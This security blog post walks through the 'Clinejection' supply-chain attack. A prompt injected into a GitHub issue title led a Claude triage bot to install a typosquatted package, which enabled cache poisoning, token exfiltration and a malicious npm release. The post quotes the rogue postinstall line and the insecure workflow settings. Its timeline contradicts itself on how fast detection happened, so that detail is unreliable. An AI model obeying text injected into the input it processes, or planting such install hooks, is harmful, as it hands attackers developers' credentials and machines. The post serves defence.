Reach security professionals who buy.

850K+ monthly readers 72% have budget authority
Advertise on HackerNoob.tips →

An attacker hid a prompt in a GitHub issue title. An AI triage bot read it, interpreted it as an instruction, and handed over the npm token. 4,000 developers got pwned.

This is the story of Clinejection — one of the most creative supply chain attacks we’ve seen in 2026.

The TL;DR

On February 17, 2026, someone published cline@2.3.0 to npm. The CLI binary was byte-identical to the previous version. The only change was one line in package.json:

"postinstall": "npm install -g openclaw@latest"

For eight hours, every developer who installed or updated Cline got OpenClaw — a separate AI agent with full system access — installed on their machine without consent.

The scariest part? The attacker got the npm token by simply opening a GitHub issue with a malicious title.

The Five-Step Attack Chain

Snyk named this attack “Clinejection” because it chains together five well-understood vulnerabilities into one devastating exploit. Let’s break it down:

Step 1: Prompt Injection via Issue Title

Cline used an AI-powered issue triage workflow running Anthropic’s Claude. The workflow was configured to let anyone trigger it by opening an issue:

allowed_non_write_users: "*"

The issue title was passed directly to Claude without sanitization:

${{ github.event.issue.title }}

On January 28, the attacker created Issue #8904. The title looked like a performance report but contained an embedded instruction telling Claude to install a package from a specific GitHub repository.

Lesson: Never interpolate untrusted input directly into AI prompts.

Step 2: AI Bot Executes Arbitrary Code

Claude interpreted the injected instruction as legitimate and ran:

npm install <attacker's-repository>

The repository was a typosquatted fork: glthub-actions/cline (notice the missing ‘i’ in ‘github’). Its package.json contained a preinstall script that fetched and executed a remote shell script.

Lesson: AI agents need guardrails. Just because an instruction looks legitimate doesn’t mean it is legitimate.

Step 3: Cache Poisoning

The shell script deployed Cacheract, a GitHub Actions cache poisoning tool. Here’s what it did:

  1. Flooded the cache with 10GB+ of junk data
  2. Triggered GitHub’s LRU (Least Recently Used) eviction policy
  3. Evicted legitimate cache entries
  4. Inserted poisoned entries matching Cline’s cache key pattern

When Cline’s nightly release workflow ran, it would restore node_modules from cache — and get the compromised version.

Lesson: GitHub Actions cache is a shared resource. Don’t assume cached data is trustworthy.

Step 4: Credential Theft

The nightly release workflow held three secrets:

  • NPM_RELEASE_TOKEN — publishes to npm
  • VSCE_PAT — publishes to VS Code Marketplace
  • OVSX_PAT — publishes to OpenVSX

When the workflow restored the poisoned cache, all three tokens were exfiltrated to the attacker’s server.

Lesson: Minimize secrets in CI/CD. Use OIDC tokens instead of long-lived credentials when possible.

Step 5: Malicious Publish

Using the stolen npm token, the attacker published cline@2.3.0 with the OpenClaw postinstall hook.

The compromised version was live for eight hours before StepSecurity’s automated monitoring flagged it — approximately 14 minutes after publication. By then, ~4,000 developers had installed it.

Lesson: Automated security monitoring catches what humans miss. Use tools like StepSecurity, Socket, or Snyk.

Why Didn’t Existing Security Tools Catch This?

ToolWhy It Missed
npm auditOpenClaw is a legitimate package. No malware to detect.
Code reviewBinary was identical. Only package.json changed by one line.
Provenance attestationsCline wasn’t using OIDC-based npm provenance at the time.
Permission promptspostinstall hooks run silently during npm install. No prompt.

The attack exploited the gap between what developers think they’re installing (a specific version of Cline) and what actually executes (arbitrary lifecycle scripts).

The Disclosure Timeline Disaster

Here’s where it gets worse:

  • December 2025: Security researcher Adnan Khan discovered the vulnerability
  • January 1, 2026: Khan reported it via GitHub Security Advisory
  • January 1-February 9: Khan sent multiple follow-ups. No response.
  • February 9: Khan publicly disclosed
  • February 9 (30 min later): Cline patched by removing AI triage workflows
  • February 10: Cline began credential rotation
  • February 10-11: Team deleted the wrong token, leaving the exposed one active
  • February 11: Discovered error, re-rotated
  • February 17: Attacker published malicious package using credentials exfiltrated before rotation

The attacker wasn’t Khan. A separate, unknown actor found Khan’s proof-of-concept on his test repository and weaponized it.

Lesson: Vulnerability disclosure requires fast, complete response. Incomplete credential rotation is worse than no rotation — it creates false confidence.

The New Pattern: AI Installs AI

Here’s what makes Clinejection different from typical supply chain attacks:

The payload wasn’t crypto mining or data theft. It was one AI tool silently bootstrapping a second AI agent on developer machines.

This creates a recursion problem:

  1. Developer trusts Tool A (Cline)
  2. Tool A is compromised to install Tool B (OpenClaw)
  3. Tool B has its own capabilities:
    • Shell execution
    • Credential access
    • Persistent daemon installation
    • Full system access

Tool B is invisible to the developer’s original trust decision. They never evaluated it, never configured it, never consented to it.

This is the supply chain equivalent of the confused deputy problem: Cline acts on the developer’s behalf, but delegates that authority to an entirely separate agent.

What You Should Do

If You’re a Developer

  1. Audit your postinstall hooks:

    npm query ":attr(scripts, [postinstall])" | jq
    
  2. Check if you installed Cline between Feb 17-18:

    which openclaw && openclaw --version
    
  3. Enable npm audit signatures:

    npm config set audit-signatures true
    
  4. Consider using lockfile-only installs:

    npm ci  # instead of npm install
    

If You’re Running AI Agents in CI/CD

  1. Never interpolate untrusted input into prompts without sanitization
  2. Restrict who can trigger AI workflowsallowed_non_write_users: "*" is asking for trouble
  3. Use OIDC tokens instead of long-lived secrets
  4. Assume cache is untrusted — verify integrity after restore
  5. Implement operation-level controls — evaluate what the AI does, not just what it says

If You’re a Project Maintainer

  1. Respond to security disclosures fast — Khan waited 5 weeks
  2. Rotate all credentials when any are exposed — verify the rotation worked
  3. Enable npm provenance — OIDC attestations would have prevented this
  4. Use automation for detection — StepSecurity caught this in 14 minutes

The Bigger Picture

The entry point for this entire attack was natural language in a GitHub issue title.

Not a malicious binary. Not a backdoored dependency. Not a zero-day exploit. Just words.

This is the new threat model for AI-assisted development:

  • AI agents process untrusted input (issues, PRs, comments)
  • AI agents have access to secrets (tokens, keys, credentials)
  • The question is: who evaluates what the AI does with that access?

Right now, for most teams, the answer is “nobody.”

The attack surface isn’t code anymore. It’s conversation.

References

  1. StepSecurity Detection Report
  2. Snyk Clinejection Analysis
  3. Adnan Khan Disclosure Thread
  4. Cline Post-Mortem
  5. Endor Labs Payload Analysis

Got questions about prompt injection or AI security? Drop them in the comments or hit us up on Twitter.